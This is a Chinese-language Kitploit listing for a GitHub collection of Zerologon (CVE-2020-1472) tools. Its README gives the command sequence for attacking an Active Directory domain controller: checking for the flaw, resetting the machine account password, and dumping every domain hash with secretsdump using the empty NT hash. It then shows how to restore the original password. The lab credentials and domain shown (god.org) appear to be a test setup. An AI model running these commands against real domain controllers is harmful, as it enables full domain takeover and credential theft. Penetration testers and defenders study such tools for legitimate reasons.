Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2020-1472_Tool-collection — cve-2020-1472_工具集合 | Kitploit
工具/GitHubGitHub/0xcccc666/cve-2020-1472_tool-collection
密码破解权限提升漏洞分析漏洞利用后渗透利用渗透测试
GitHub0xcccc666/cve-2020-1472_tool-collection

cve-2020-1472_Tool-collection

cve-2020-1472_工具集合

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2255年前尚未审核

Introduction article

https://www.yuque.com/shamo-vs4ia/vul/ktduf8

Environmental preparation

pip3 install -r requirements.txt

Vulnerability detection

python3 zerologon_tester.py ad ad_ip

image.png

Exploit

python CVE-2020-1472.py AD AD$ adip image.png

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'god.org/[email protected]' image.png image.png

Successfully exported all hashes

Query hash

before: secretsdump.py god.org/administrator:Admin12345@ad_ip -just-dc-user 'AD$'

image.png

after: secretsdump.py god.org/administrator:Admin12345@ad_ip -just-dc-user 'AD$'

image.png

restore password

python3 reinstall_original_pw.py ad_hostname ad_ip哈希 image.png

Collected from

https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472

https://github.com/risksense/zerologon

https://github.com/VoidSec/CVE-2020-1472

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472

下载工具